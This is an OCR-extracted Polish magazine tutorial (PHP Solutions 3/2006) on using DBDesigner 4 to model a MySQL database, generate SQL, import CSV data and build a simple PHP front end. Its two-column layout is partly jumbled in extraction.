ków. Pau studiuje obecnie Nauki Kompu-
terowe na Politechnice Uniwesytetu Cala-
tonii (upc.edu). Jest głównym dewelope-
rem projektu eyeOS, skupia się na rozwi-
janiu rdzenia systemu.
Kontakt z autorami: team@eyeos.org
41
Narzędzia

DBDesigner 4 – odpowiednik
Oracle Designera
Stopień trudności: lll
Pierre HEBEL

Poprawne modelowanie danych jest gwarancją

(tak jak przemyślane programowanie)
skuteczności podczas formuowania zapytań do
Waszej bazy danych. DBDesigner 4 pozwala,
szczególnie na dużych strukturach danych, mieć
globalny, graficzny i bardzo precyzyjny widok
organizacji danych na jakich pracujemy.

D
BDesigner jest narzędziem gra-
ficznym, które wspomaga analizę
istniejącej bazy danych lub kon-
cepcji nowej i współpracuje z PHP i My-
SQL-em. Pokażemy to na konkretnym,
z życia wziętym przykładzie: przenosze-
niu danych ze starego systemu bazoda-
nowego.
Problematyka
Pewne przedsiębiorstwo aktualizu-
W SIECI je swoje oprogramowanie bazodano-
we, które zostało napisane w Cobolu i
działa na maszynach typu Mainframe.
1. http://www.fabforce.net
– oficjalna strona
Zmiana będzie polegała na zastąpieniu
DBDesigner 4 starych aplikacji nowymi przy zachowa-
2. http://dev.mysql.com/tech- niu danych oraz ich struktury. Nie wie-
resources/interviews/mike-
my jeszcze, jakich konkretnie aplikacji
zinner.html
– wywiad (po angielsku) będziemy używali, poza tym, że obsłu-
z Michaelem G. Zinnerem,
twórcą DBD4. gą naszych danych zajmie się MySQL.
3. http://www.fabforce.net/ Przeniesiemy więc dane w postaci in-
downloads.php
tegralnej ze starych baz do MySQL-a,
– wersje dystrybucyjne
DBDesignera 4 korzystając z plików CSV oraz XML.
Użyjemy w tym celu narzędzia, które
umożliwia import takich plików, a tak-
że pomoże nam w zaprojektowaniu ba-
zy w MySQL-u oraz włączeniu do niej
struktury istniejących danych.
Interfejs użytkownika
DBDesigner 4 ma wygodny w obsłu-
dze, intuicyjny interfejs okienkowy, po-
zwalający na szybkie zaznajomienie
się z aplikacją. Przedstawiamy go na
Co należy wiedzieć...
Wymagana jest podstawowa umiejęt-
ność pracy z PHP i MySQL-em. Przy-
datna będzie również choćby minimalna
wiedza teoretyczna na temat relacyjnych
baz danych.
Co obiecujemy...
Pokażemy, jak przy użyciu DBDesigne-
ra stworzyć model bazy danych i uczy-
nić z niego działającą bazę, do której
będziemy przenosili dane z baz istnie-
jących, a także jak w prosty sposób ge-
nerować kod PHP odpowiedzialny za ob-
sługę tej bazy.

42 www.phpsolmag.org PHP Solutions Nr 3/2006


Rysunek 1. DBDesigner 4 GUI
Rysunku 1, przy czym naniesione nu-
mery oznaczają odpowiednio:
1. Menu główne: udostępnia komplet
funkcji, parametrów i zasobów DBDe-
signera 4.
2. Pasek narzędzi: bezpośredni dostęp
do funkcji modelowania graficznego
(ikony).
3. Pasek statusu: informuje o aktualnym
stanie wykonywanej pracy.
4. Strefa modelowania graficznego: tu
znajduje się model graficzny bazy da-
nych jest to główne atelier graficzne,
pozwalające na łatwe modelowanie
bazy danych.
5. Reprezentacja graficzna przykładowej
tablicy bazodanowej.
6. Panel nawigacyjny: plan modelu gra-
ficznego bazy danych, umożliwiający
wybranie jego konkretnego fragmentu
oraz jego pomniejszanie i powiększa-
nie.
PHP Solutions Nr 3/2006
7. Panel typów danych: pomaga w two-
rzeniu nowych oraz określaniu istnie-
jących typów danych (w tym ich przy-
pisywaniu do grup).
8 Panel modelu bazy danych: umożli-
wia szybki dostęp do wszystkich tabel
danego modelu.
Czas na modelowanie
Następna czynność, która nas czeka
to modelowanie. Aby się za nie zabrać,
otworzymy plan pracy i zapiszemy nowy
model poprzez wejście do menu główne-
go: Plik -> Nowy oraz Plik -> Zapisz ja-
ko...
W tym momencie możemy wybrać
miejsce w którym zapiszemy nasz plik
(domyślnie jest nim folder instalacyjny
DBDesignera). Plik naszego modelu bę-
dzie nosił nazwę MCDTEST i zostanie
zachowany w formacie XML, co umoż-
liwi jego łatwe wykorzystanie przez in-
ne aplikacje.
www.phpsolmag.org
DBDesigner 4 Narzędzia
Tworzenie tabeli
Aby utworzyć strukturę nowej tabeli, kli-
kamy ikonę Nowa tabela na pasku za-
dań, a następnie umieszczamy ją w ob-
szarze roboczym. Przejdźmy teraz do
edycji tabeli: w tym celu klikamy na niej
kilkakrotnie lub otwieramy menu kontek-
stowe prawym przyciskiem myszy i wy-
bieramy opcję Edytuj obiekt.
Czas określić parametry tabeli. Za-
czniemy od zmiany nazwy z Table_nn (nn
– numer tabeli, np. 01) na Ident_agent.
Gdy przejdziemy do do listy kolumn w
tym samym oknie, program automatycz-
nie utworzy pierwszą kolumnę i uczy-
ni ją kluczem głównym, a także określi
wszystkie jej parametry, takie jak typ da-
nych, NOT NULL (kolumna NN) czy AU-
TO INCREMENT (kol. AI). Dwie ostatnie
pozycje będą zaznaczone, co jest nor-
malne w przypadku klucza głównego.
Przejdźmy do utworzenia nastę-
pujących pól: Nazwisko, Imie, Data_
43
Narzędzia DBDesigner 4
urodzenia. Typ danych każdego pola
możemy wybrać z listy proponowanych,
albo przeciągnąć z panelu Typy danych
(Rysunek 1, nr 7). Dla nazwiska i imienia
wybieramy typ VARCHAR – ustalamy jego
długość, np. na 45 i 30, podczas gdy pole
data_urodzenia będzie miało typ DATE.
Jeżeli chcemy określić wybrane pola ja-
ko obowiązkowe, musimy zaznaczyć dla
nich kolumnę NN.
Dodatkowo, dla każdego pola możemy
ustalić flagi (flags) związane z reprezento-
waniem danych w tabeli. Dany atrybut mo-
że być nieoznakowany (UNSIGNED), bi-
narny (BINARY) oraz domyślnie wypełnia-
ny zerami (ZEROFILL). Możliwość ustala-
nia flag zależy od typu pola, np. DATE nie
ma żadnych, INTEGER ma UNSIGNED i ZE-
ROFILL, a VARCHAR – BINARY. Każdemu
polu możemy też nadać wartość domyśl-
ną czy przypisać komentarz – to ostatnie
przydaje się podczas późniejszych analiz.
Wypełniony zestaw pól prezentujemy na
Rysunku 2. Tabela jest gotowa, możemy
(ale nie musimy) zamknąć okno – pola zo-
staną zapisane.
Do naszej tabeli ident_agent dodamy
teraz pola zawierające zwrot grzeczno-
ściowy (np. Pan, Pani, Panna, Mr., Mrs.,
itd) oraz miejscowość. Ponieważ są to da-
ne powtarzające się, więc najlepiej stwo-
rzyć dla nich dwie osobne tabele:
l C_Zwrot – tabela zwrotów grzecz-
nościowych. Będzie ona zawiera-
ła klucz główny (typ INTEGER) oraz
krótką etykietę LIB_ZWR_C typu
VARCHAR(5) i długą etykietę LIB_ZWR_
L typu VARCHAR(12).
Rysunek 2. Interfejs tworzenia tabeli
44
Wymagania
DBDesigner 4 działa pod Windows (wersja 4.0.5.6) oraz Linuksem (wersja 4,0,5,4). Do-
stępna jest wersja z instalatorem (EXE oraz RPM), a także kod źródłowy (ZIP i TAR.GZ)
i dokumentacja (HTML i PDF). Do modelowania baz danych wystarczy instalacja same-
go DBDesignera. Aby jednak w pełni wykorzystać jego możliwości, potrzebujemy pełnego
środowiska *AMP a (PHP+MySQL+Apache lub IIS). DBDesigner 4 jest programem open-
sourcowym (GNU GPL), a jego kod źródłowy został napisany w Delphi – aby go modyfiko-
wać, potrzebujemy Delphi 7 lub Kylixa 3.
Instalacja
Dla wersji pod Windows (2000 lub XP) pobieramy plik DBDesigner4.0.5.6_Setup.exe i uru-
chamiamy go. Program instalacyjny poprowadzi nas przez resztę instalacji.
Dla wersji pod Linuksa pobieramy plik DBDesigner4.0.5.4.tar.gz i umieszczamy go w swo-
im katalogu domowym. Następnie rozpakowujemy archiwum poleceniem tar xvzf DBDes
igner4.0.5.4.tar.gz, po czym przechodzimy do katalogu głównego aplikacji i wykonuje-
my znajdujący się w nim skrypt startdbd.sh.
l C_Miejsce – znajdą się w niej pola: lu po prostu przeciągniemy go do góry w
klucz główny (typ INTEGER) oraz na- trybie edycji tabeli.
zwa miejscowości (LIB_Miejsce) typu Zamkniemy teraz okno zatwierdzając
VARCHAR(60). zmiany. Warto również zapisać stan ak-
tualnej pracy ([CTRL]+[S]). Analogicznie
Czas na ustalenie związków między ta- jak z tabelą miejscowości postępujemy w
belami. Klikamy na ikonę określającą przypadku zwrotów grzecznościowych.
typ relacji jeden do jednego, a następnie Nasz graficzny model danych jest go-
na tabelę C_Miejsce, po czym na Ident_ towy (Rysunek 3).
agent (kolejność wyboru relacji ma zna-
czenie zasadnicze): relacja między ta- Upiększamy
belami zostanie utworzona, a w tabeli i porządkujemy model
Ident_agent pojawi się klucz obcy ozna- graficzny
czony symbolem FK (od Foreign Key) o W miarę rozrostu modelu graficznego na-
nazwie C_Miejsce_FKIndex1, zawierają- szej bazy danych, konieczne staje się
cy pole C_Miejsce_idC_Miejsce. uporządkowanie tabel oraz relacji w mo-
Uzyskana relacja ma nazwę Rel_nn delu oraz ich logiczny podział na bloki.
(nn to kolejny numer) – zmienimy ją kli- DBDesigner ułatwia nam wybieranie wie-
kając na niej dwukrotnie i wpisując lu obiektów na raz – wystarczy przytrzy-
nazwę R_MiejsceUrodzenia. Poprawimy mać klawisz [CTRL].
też wygląd tabeli Ident_agent przesuwa- Wzrokowe odróżnianie bloków tabel uła-
jąc klucz obcy (FK) na miejsce w tabeli, twiają obszary (ang. regions) – prostokąty
które wydaje nam się najbardziej logicz- wyróżniające się nazwą i kolorem tła, we-
ne: zaraz po dacie urodzenia. W tym ce- wnątrz których będą się znajdowały obiek-
ty. Aby dodać obszar, klikamy ikonę Nowy
obszar w pasku narzędzi, po czym rozcią-
gamy prostokąt w obszarze roboczym.
Dwukrotne kliknięcie na tak umieszczo-
nym obszarze umożliwi nam nadanie
mu parametrów takich, jak nazwa i ko-
lor. Warto wiedzieć, że rola obszarów nie
kończy się na ułatwianiu odróżniania jego
zawartości od innych obiektów – pozwala
on także ustawiać parametry tabeli, takie
jak jej typ (MyISAM, InnoDB, itd), bazę,
do której należą tabele znajdujące się w
obszarze oraz umieszczać komentarz.
Opisywanie i upiększanie modelu
danych jest możliwe również przez:
l umieszczanie na nim obrazów: klika-
my na ikonę paska narzędzi przed-
stawiającą drzewo, wybieramy w ob-
szare roboczym miejsce, w którym
www.phpsolmag.org PHP Solutions Nr 3/2006
 DBDesigner 4 Narzędzia

chcemy umieścić obraz, a następnie

wybieramy plik graficzny i (opcjonal-
nie) ustalamy nazwę obrazu, urucha-
miając tryb edycji podwójnym kliknię-
ciem na niego,
l dodawanie komentarzy: klikalmy na
ikonę paska narzędzi przedstawiają-
cą literę T i wybieramy w obszarze ro-
boczym miejsce docelowe. Podwój-
ne kliknięcie na pole tekstowe pozwoli
dodać komentarz,
l zmiana trybu wyświetlania mode-
lu: główne informacje, typ notacji,
szczegóły kolumn, siatka pomoc-
nicza, itd) w menu Wyświetlanie
(Display).

Tworzenie dokumentacji
Rysunek 3. Model mcdtest
Gdy już skończycie wasz model, będzie-
cie zapewne chcieli stworzyć dokumen- wpisujemy nazwę pliku i zapisujemy ob- DBDesignera wybieramy plugins -> Html-
tację. DBD4 pomoże wam także w tej raz jako BMP lub PNG. Report. Następnie wybieramy zdefiniowa-
kwestii. ny wcześniej obszar (region), którego ra-
Sporządzanie raportu na port ma dotyczyć, wybieramy dodatko-
Eksport obrazu do pliku podstawie bazy (plugin we ustawienia i klikamy na ikonę Execu-
graficznego HTMLREPORT) te. Program zapyta nas o nazwę pliku, po
Aby wyeksportować obraz do pliku gra- Ten plugin pozwala sporządzić opis struk- czym zapisze w nim raport (Rysunek 4).
ficznego, wchodzimy do menu Plik -> tury bazy w formie raportu w formacie
Eksportuj -> Eksportuj model jako obraz, HTML (Rysunek 4). W menu głównym Praktyczne
wykorzystanie
Listing 1. Wygenerowane polecenia SQL (mcdtest.txt) gotowego modelu
Przejdźmy teraz do praktycznego wy-
-- ------------------------------------------------------------
korzystania gotowego modelu bazy da-
-- Tabela kodów zwrotów grzecznościowych
-- ------------------------------------------------------------ nych. Co możemy z nim zrobić? Istnieją-
ce opcje obejmują: automatyczne utwo-
CREATE TABLE C_Zwrot ( rzenie na jego podstawie skryptu SQL,
idC_Zwrot INTEGER UNSIGNED NOT NULL AUTO_INCREMENT, zaimportowanie do niej danych z plików
Lib_Civ_C VARCHAR(5) NULL,
CSV, wygenerowanie PHP-owego inter-
Lib_Civ_L VARCHAR(12) NULL,
PRIMARY KEY(idC_Zwrot) fejsu obsługi danych czy ułatwienie prze-
); glądania bazy. Omówimy je po kolei.
-- ------------------------------------------------------------
-- Tabela miast Eksport struktury bazy
-- ------------------------------------------------------------
CREATE TABLE C_Miejsce (
do skryptu SQL
idC_Miejsce INTEGER UNSIGNED NOT NULL AUTO_INCREMENT, Aby na podstawie naszego modelu wyge-
Lib_Miejsce VARCHAR(60) NULL, nerować skrypt SQL tworzący tabele bazo-
PRIMARY KEY(idC_Ville) danowe, w menu głównym wybieramy po-
); zycję Plik -> Eksportuj -> Skrypt tworzenia
SQL (Export SQL Script). Pojawi się pa-
-- ------------------------------------------------------------
-- Tabela identyfikacji rekordów nel opcji , pozwalający wybrać tabele do
-- ------------------------------------------------------------ wygenerowania, ustalić ich kolejność oraz
CREATE TABLE Ident_agent ( zdecydować m.in. o tym, czy chcemy two-
idIdent_agent INTEGER UNSIGNED NOT NULL AUTO_INCREMENT, rzyć klucze własne i obce. Zalecane jest
C_Zwrot_idC_Zwrot INTEGER UNSIGNED NOT NULL,
korzystanie z parametrów domyślnych.
Imie VARCHAR(45) NOT NULL,
Nazwisko VARCHAR(30) NULL, Skrypt SQL zostanie wygenerowany,
DataUrodzenia DATE NOT NULL, gdy wybierzemy jego zapis do schowka
C_Miejsce_idC_Miejsce INTEGER UNSIGNED NOT NULL, (clipboard) lub pliku. Na Listingu 1 przed-
PRIMARY KEY(idIdent_agent), stawiamy instrukcje SQL-owe dla nasze-
INDEX Ident_agent_FKMiejsce(C_Miejsce_idC_Miejsce),
go przykładu.
INDEX Ident_agent_FKZwrot(C_Zwrot_idC_Zwrot)
); Tak uzyskany plik możemy wyko-
nać przy pomocy linii poleceń klienta My-

PHP Solutions Nr 3/2006 www.phpsolmag.org 45

Narzędzia DBDesigner 4
SQL-a lub korzystając z takich narzędzi,
jak phpMyAdmin. Założymy bazę mcd-
test i wykonamy na niej uzyskany skrypt.
Po utworzeniu tabel przejdziemy do
ich uzupełniania – również w tym pomo-
że nam DBDesigner.
Import danych do bazy
(plugin-in DataImporter)
Wspominaliśmy już, że będziemy wydoby-
wać dane ze starej bazy przy użyciu plików
CSV (ang. Comma-Separated Values), za-
wierające dane oddzielone przecinkami.
Ich zaimportowanie do nowej bazy ułatwi
plugin DataImporter: dzięki niemu doko-
namy tego nie pisząc ani jednej linijki kodu!
W menu głównym wybieramy Plugins/
DataImporter – pokaże się panel parame-
trów. Zanim to jednak zrobimy upewnij-
my się, że MySQL jest włączony – zarów-
no pod Windows, jak i w Linuksie może-
my tego dokonać uruchamiając klienta te-
go systemu bazodanowego (plik mysql) al-
bo interfejs typu phpMyAdmin. Warto wie-
dzieć, że my pracujemy lokalnie na serwe-
rze localhost.
Następnie wybieramy plik z danymi do
zaimportowania i nawiązujemy połączenie
bazodanowe – klikamy na ikonę przedsta-
wiającą plik z lupą (Destination database
connection), po czym wybieramy bazę da-
nych (mcdtest) ze znajdującego się po le-
wej stronie otwartego właśnie panelu drze-
wa i wpisujemy dane użytkownika (login i
hasło, które może być puste) oraz klikamy
na ikonę Connect (Rysunek 5).
Wybierzmy teraz źródło danych.
W tym celu klikniemy na ikonę ... (trzy
kropki) znajdującą się na przycisku Im-
port from Text Files, po czym przechodzi-
my do odpowiedniego folderu i wybiera-
my plik z danymi, na przykład agent.txt.
Rysunek 4. Lista dostarczona przez HtmlReport
46
Rysunek 5. DataImporter : parametry pliku źródłowego
DBDesigner kontra inne narzędzia do modelowania
Na rynku istnieje wiele profesjonalnych narzędzi do modelowania danych (AllFusion®
Erwin® Data Modeler, Oracle's Designer©, IBM's Rational Rose© czy theKompany's
DataArchitect©). Dlaczego więc warto używać DBDesignera? Przede wszystkim, jest bar-
dzo prosty w obsłudze i wielojęzyczny, a system pluginów oraz dostępny kod źródłowy
(licencja GNU/GPL) umożliwia jego łatwą rozbudowę. Ma tez dobrą dokumentację (HTML,
PDF i klipy we Flashu). Po drugie, współpracuje on z różnymi typami baz danych (MySQL,
M SSQL, SQLite, Oracle, ODBC, itd). Nie bez znaczenia jest również fakt, iż DBDesigner
jest narzędziem opensourcowym i darmowym oraz to, że jest niewielkich rozmiarów.
W prawej części panelu, od razu pojawi się my dane z naszego pliku źródłowego
wstępne odwzorowanie. z polami w bazie danych. Najpierw
Klikamy na Text Options i gdy ukażą wybierzemy tabelę docelową z listy
się nam parametry (wygenerowane auto- Destination Table – w naszym przypad-
matycznie), pozostawimy je w formie nie- ku będzie to Ident_agent. Ujrzymy po-
naruszonej, za wyjątkiem opcji First row la tej tabeli – musimy je tylko przenieść
contains field names, którą odhaczymy, z Field from source do odpowiednich pól
ponieważ w naszym pliku nie ma wiersza w Fields of the destination table.
tytułowego. Możemy nazwać pola wybie- Za pomoca przycisku General Options
rając każdą kolumnę za pomocą kliknięcia, (Rysunek 6) zaznaczymy Clear table be-
a następnie oznaczając pole Fieldname. fore data insert, wraz w dwiema inny-
Za pomocą przycisku Column Map- mi opcjami. Użycie tego przycisku umoż-
ping odwzorujemy nasze dane: zwiąże- liwia również automatyczną zamianę wy-
branych znaków po zaimportowaniu da-
nych (przykładowo, gdybyśmy mieli po-
le typu email, to znak @ nie zostałby pra-
widłowo zinterpretowany i byłby zastąpio-
ny przez à).
Po ustaleniu parametrów, możemy je
zapisać w celu ewentualnego późniejsze-
go wykorzystania. Aby tego dokonać, kli-
kamy na Store these settings as Preset,
a następnie nadajemy temu zestawowi pa-
rametrów nazwę (np. impAgent).
Możemy teraz kliknąć na przycisk
Execute: dane zostaną wciągnięte do ba-
zy, co możemy sprawdzić np. za pomocą
phpMyAdmina albo należącego do DBDe-
signera Edytora Zapytań (Query Editor,
Rysunek 7). W tym drugim przypadku kli-
www.phpsolmag.org PHP Solutions Nr 3/2006

kamy prawym przyciskiem na schemat ta-
beli Ident_agent i wybieramy polecenie
Edycja danych w tabeli w menu kontek-
stowym. Otworzy się okno wyświetlają-
ce widok obejmujący dane w tabeli. Klika-
jąc w tym oknie na ikonę SQL, będziemy
mieli dostęp do edytora SQL, co pozwoli
nam wykonywać kwerendy dotyczące ta-
beli, a także m.in. aktualizować dane. To
samo zrobimy dla dwóch pozostałych ta-
bel, a następnie opuszczamy plugin.
Baza została uzupełniona – zobacz-
my teraz, jak z niej skorzystać przy po-
mocy innego plugina: SimpleWebFront.
Plugin SimpleWebFront
SimpleWebFront pozwala generować pro-
sty PHP-owy interfejs do zarządzania da-
nymi. Aplikacja ta będzie mogła działać
niezależnie lub stanowić część większe-
go projektu.
Po uruchomieniu plugina SimpleWeb-
Front (menu główne: plugins -> Simple-
WebFront) wybieramy pozycję General
Options (Rysunek 8) i podajemy informa-
cje dotyczące połączenia z bazą danych
mcdtest, a także docelowy tytuł aplikacji
(Web Title) oraz położenie skryptów PHP,
które zostaną wygenerowane – te trzy in-
formacje są niezbędne. Aplikacja będzie
się składała z kilkunastu plików, w tym in-
dex.php i db_open.php. Zwróćmy uwagę
na dwie istotne sprawy:
l dopóki nie podamy wszystkich nie-
zbędnych informacji, ikona Create
Webpages będzie niedostępna (nie-
które z tych informacji znajdują się
pod innymi przyciskami),
Rysunek 6. DataImporter: różne opcje
PHP Solutions Nr 3/2006
DBDesigner 4 Narzędzia
Rysunek 7. QueryEditor: Proste zapytania
Historia
DBDesigner został stworzony przez Michaela G. Zinnera, szefa ekipy FabFORCE.net.
Strona internetowa fabFORCE.net powstała na początku 2003 roku, aby zaoferować plat-
formę dla projektów Open Source rozwijanych przez założony w tym samym roku przez
Zinnera zespół fabFORCE.net. Grupa ta tworzy opensourcowe narzędzia dla programi-
stów, koncentrując się w szczególności na aplikacjach bazodanowych.
W czasie powstania projektu DBDesigner Michael G. Zinner dołączył do MySQL AB, gdzie
pracował nad programami: MySQL Administrator, MySQL Query Browser oraz MySQL
Migration Toolkit. Aktualnie, jego zespół zajmuje się następcą DB Designera, noszącym
nazwę MySQL Workbench. Nie będzie to przeróbka DBD4, tylko zupełnie nowa, wysoce
wydajna aplikacja korzystająca z OpenGL-a.
Na stronach fabFORCE.net znajduje się też wiele odnośników do stron związanych z gra-
fiką, fotografią, obrazem i jego obróbką.
l musimy wpisać hasło. Może to być Add tables określamy żądany widok, m.in.
problemem, gdyż zwykle w środowi- nazwę, tabelę główną, sposób sortowania,
sku testowym w ogóle go nie poda- kryterium wyszukiwania czy kolumny.
jemy (jest ono pustym łańcuchem). Przejdźmy teraz do panelu Groups
SimpleWebFront nie toleruje takiego (Rysunek 9). Tutaj zdefiniujemy grupy wi-
podejścia, więc trzeba mu wpisać do- doków. Każdej grupie nadamy nazwę oraz
wolne hasło, ktore później możemy przypiszemy do niej zdefiniowane przez
zmienić w wygenerowanym skrypcie nas widoki (wybrane widoki muszą się zna-
PHP (zmienna $password = ""; w pli- leźć na liście Assigned Views) lub określo-
ku db_open.php). ne podczas modelowania architektury ba-
zy danych obszary (regiony). Zalecane jest
Następnie przechodzimy do panelu Views, regularne zapisywanie parametrów (Save).
gdzie po kliknięciu na Create new view lub Po tych operacjach przycisk Create Pages
stanie się wreszcie dostępny: my jednak
dopracujemy nasze ustawienia.
Wybierzmy panel Grid Options. Okre-
ślimy w nim, które spośród zdefiniowanych
za pomocą widoków i grup kolumn będą
Reverse Engineering
Reverse Engineering to w tym przypad-
ku odtwarzanie modelu graficznego ist-
niejącej bazy danych. W programie DB
Designer jest dostępne jako opcja w me-
nu głównym (Database -> Reverse Engi-
neering) i wymaga wcześniejszego połą-
czenia z bazą, z której będziemy korzy-
stać (Plik -> Otwórz bazę danych). Na-
stępnie na panelu parametrów wybiera-
my typ bazy danych (MySQL, Oracle,
itd), tabele, które wejdą w skład mode-
lu oraz typy powiązań między tabelami.
Wygenerowany model zostanie umiesz-
czony w obszarze roboczym i będziemy
mogli go swobodnie edytować.
www.phpsolmag.org 47
Narzędzia DBDesigner 4

widoczne w docelowym skrypcie PHP, za-

znaczając lub odznaczając nazwy tych
atrybutów. Każdej kolumnie możemy rów-
nież nadać etykietę (Caption), pod któ-
rą będzie ona widoczna na stronie doce-
lowej. Ustawimy także liczbę wierszy na
stronie. Pozostało już tylko wygenerować
(Create Webpages)i zapisać (Save) skrypt
(index.php).
Po zmianie zapisanego w skryp-
cie db_open.php hasła na puste ($pas-
sword='') wywołamy utworzony skrypt in-
dex.php w przeglądarce internetowej. Po-
zwala on m.in. ustalić kryteria wyszukiwa-
nia (w tym celu należy kliknąć na ikonie Rysunek 9. SimpleWebFront, grupy
przedstawiającej lupę, Rysunek 10) czy
aktualizować dane klikając na ikonę z klu-
czem mechanika (Rysunek 11).
Uwaga: skrypt nie sprawdza popraw-
ności danych, a zły wpis zostanie potrak-
towany jak dobry i zapisany z wartością
domyślną (np. zła data jako 0000-00-00).

Asystent zapytań
Asystent zapytań (Rysunek 12) pomaga
przy formułowaniu kwerend SQL-owych.
Uruchomimy go zmieniając w menu
głównym tryb wyświetlania na Tryb zapy-
tań (Display -> Query mode).
Jak wygląda ułatwienie tworzenia za-
pytań? Po pierwsze, możemy przeciągnąć
nazwę tabeli lub pola z obszaru roboczego
do obszaru wprowadzania zapytań – poja-
wi się zestaw kwerend do wyboru. Po dru-
gie, w pasku narzędzi DBDesignera znaj-
dą się m.in. ikony przedstawiające kwe-
rendy oraz ich elementy. Wybierając odpo-
wiednie zapytanie w tym pasku, a następ-
nie klikając na danej nazwie tabeli lub polu
w obszarze roboczym spowodujemy utwo-
rzenie odpowiedniej kwerendy. UWAGA:
ta drua możliwość nie zawsze działa, nie-
stety. Zawsze możemy natomiast ręcznie
Rysunek 10. SimpleWebFront: wybór widoków
uzupełniać wstępnie utworzone kwerendy,
a gdy jesteśmy połączeni z bazą danych
(menu główne: Database -> Connect...),
również je wykonywać. Zapytanie wykona-
my klikając na żółtą ikonę z zieloną strzał-
ką: jego rezultat ukaże się w oknie po pra-
wej stronie.
Inne możliwe sposoby
wykorzystania
Załóżmy, że korzystamy z narzędzia pro-
wadzącego statystyki odwiedzin na na-
szej witrynie internetowej i zapisujące-
go je w bazie danych. Pojawiła się no-
wa wersja tej aplikacji, w której zmieniono
również strukturę bazy danych. Chcieliby-
śmy zainstalować to nowe wydanie sys-
temu statystyk i zaimportować do niego
zgromadzone dotychczas dane – nieste-
ty, twórca narzędzia tego nie przewidział.
Co robić?
Zainstalujmy tę nową wersję syste-
mu statystyk i załóżmy dla niego nową
bazę (koniecznie pod inną nazwą niż
baza już istniejąca). Następnie odtwórz-
my strukturę obu baz, np. łącząc się ko-
lejno z każdą z nich spod DBDesignera
lub korzystając z phpMyAdmina. Po wy-
konaniu tej czynności użyjemy funkcji
DBDesignera o nazwie Reverse Engi-
neering (menu główne: Database -> Re-
verse Engineering, zobacz Ramka Re-
verse Engineering) w celu zrekonstru-
owania modelu każdej z baz w formie
graficznej. Korzystając z Asystenta Za-
pytań oraz innych funkcji DBDesigne-
ra, które opisaliśmy, łatwo porównamy
strukturę obu baz i przeniesiemy dane
ze starej do nowej.

Porady i sztuczki
Korzystając z programu warto wiedzieć
o kilku użytecznych rzeczach. Oto wska-
Rysunek 8. SimpleWebFront, parametry Ogólne zówki ułatwiające pracę z programem:

48 www.phpsolmag.org PHP Solutions Nr 3/2006


l jak najczęściej korzystajmy z Nawi-
gatora (Navigation & Info), gdyż nie-
zmiernie ułatwia on poruszanie się
obszarze roboczym (szczególnie
przy bardziej rozbudowanym mode-
lu),
l jeśli nasz model zawiera wiele ta-
bel, możemy mieć trudność z od-
nalezieniem tej właściwej w obsza-
rze roboczym. Tu pomoże nam pa-
nel Model BD (DB Model), pozwa-
lający przeglądać tabele w postaci
drzewa i wybierać z niego dowolne
pozycje,
l jeżeli chcemy wydrukować obszar ro-
boczy, warto wyeksportować go jako
obraz (menu główne: Plik -> Ekspor-
tuj -> Eksportuj Model jako Obraz),
zamiast korzystać z opcji Plik -> Wy-
ślij na drukarkę, gdyż będziemy mo-
gli poddać go obróbce. Jest to szcze-
gólnie istotne, gdy model jest duży
i nie mieści się na ekranie,
l jedynymi obsługiwanymi przez DBDe-
signera formatami obrazów są BMP
i PNG. Ze względu na rozmiar warto
wybrać ten drugi,
l plugin SimpleWebFront działa w zde-
finiowanych przez użytkownika Ob-
szarach (Regionach). Jeżeli chcemy
obsłużyć przy jego pomocy cały mo-
del, musimy zdefiniować Obszar, któ-
ry będzie go obejmował. Warto okre-
ślić kolor tego obszaru jako neutralny,
np. biały,
Pojawiające się
problemy i błędy
programu DBDesigner
Podczas pracy z DB Designerem, musi-
my uważać na błędy. Mogą one zaważyć
na strukturze bazy, dlatego nie należy ich
lekceważyć:
l przy tworzeniu nowej tabeli, definio-
wana automatycznie kolumna klu-
Rysunek 11. SimpleWebFront:
Aktualizowanie widoku
PHP Solutions Nr 3/2006
Rysunek 12. Asystent zapytań
cza głównego nie pojawia się od ra-
zu – zwykle trzeba nacisnąć [TAB] al-
bo kliknąć parę razy na liście atrybu-
tów poniżej tego pola,
l nie zawsze działa wybieranie frag-
mentów kwerend w Asystencie Zapy-
tań,
l prawdziwy bug: funkcja DataType
Replace – zastąpienia typów danych
(w jednej lub wielu tabelach) przez
zestaw innych typów nie działa, je-
śli musimy edytować parametr (np.
zmienić CHAR(8) na DATE),
l gdy wyjdziemy z plugina HtmlReport,
pokaże on, że model został zmo-
dyfikowany i zaproponuje zapisa-
nie zmian. Istniejący w pluginie błąd
powoduje duplikację backslashy (\)
w pliku modelu, w strefie <tableprefi-
xes>. Ta duplikacja może przybierać
ogromne rozmiary, prowadząc nawet
do nadmiernego obciążenia pamię-
ci komputera. Problem ten rozwiąże-
my ręcznie, wyłączając DBDesigner,
otwierając ten plik i usuwając back-
slashe za pomocą dowolnego edy-
tora programistycznego. Zabieg ten
musimy powtarzać po 3 lub 4 uży-
ciach pluginu,
l tłumaczenia na języki niemiecki i fran-
cuski są miejscami niekompletne.
Konkluzja
Na rynku istnieje co najmniej kilka roz-
wiązań, których założenia zbliżóne są do
założeń DBDesignera. Programy te po-
zwalają w znaczący sposób ułatwić pra-
cę z bazami, umożliwiają bowiem bardzo
profesjonalne podejście już do etapu mo-
delowania. W artykule pokazaliśmy, jak
korzystając z DBDesignera łatwo zapro-
jektować strukturę bazy, wczytać do niej
www.phpsolmag.org
DBDesigner 4 Narzędzia
dane i wykonywać zapytania czy przeno-
sić dane między bazami o różnych struk-
turach.
Bardzo cenną cechą DBDesignera jest
to, że nie służy on wyłącznie projekto-
waniu baz, ale wspiera i ułatwia codzien-
ną pracę z bazami. Program ma wiele
więcej zastosowań, o których nie wspo-
mnieliśmy w niniejszym artykule, takich
jak synchronizacja i utrzymanie bazy da-
nych. Te cechy bardzo często okazują
się bardzo przydatne.
Podsumowując: szeroki wachlarz moż-
liwości programu, wygoda obsługi i napraw-
dę dobra dokumentacja czynią z DBDe-
signera profesjonalne narzędzie przydat-
ne każdemu, kto ma do czynienia z two-
rzeniem i zarządzaniem bazami danych.
Poświęcajmy należytą uwagę projektowa-
niu, bo poprawne modelowanie danych jest
gwarancją skutecznoci podczas formuowa-
nia zapytań do bazy danych. n
O autorze
Pierre Hebel jest analitykiem informa-
tycznym. Pracował 7 lat w SSII (CGI :
Compagnie Générale Informatique).
Obecnie zajmuje się integrowaniem
systemu zarządzania szpitalem ja-
ko ekspert techniczny do spraw ERP
SIGAGIP na maszynach mainframe.
Jest całkowitym samoukiem w tematy-
ce komputerowej. Od roku 1999 zreali-
zował i współuczestniczył w kilku pro-
jektach i witrynach internetowych należą-
cych do grup amatorskich i profesjonal-
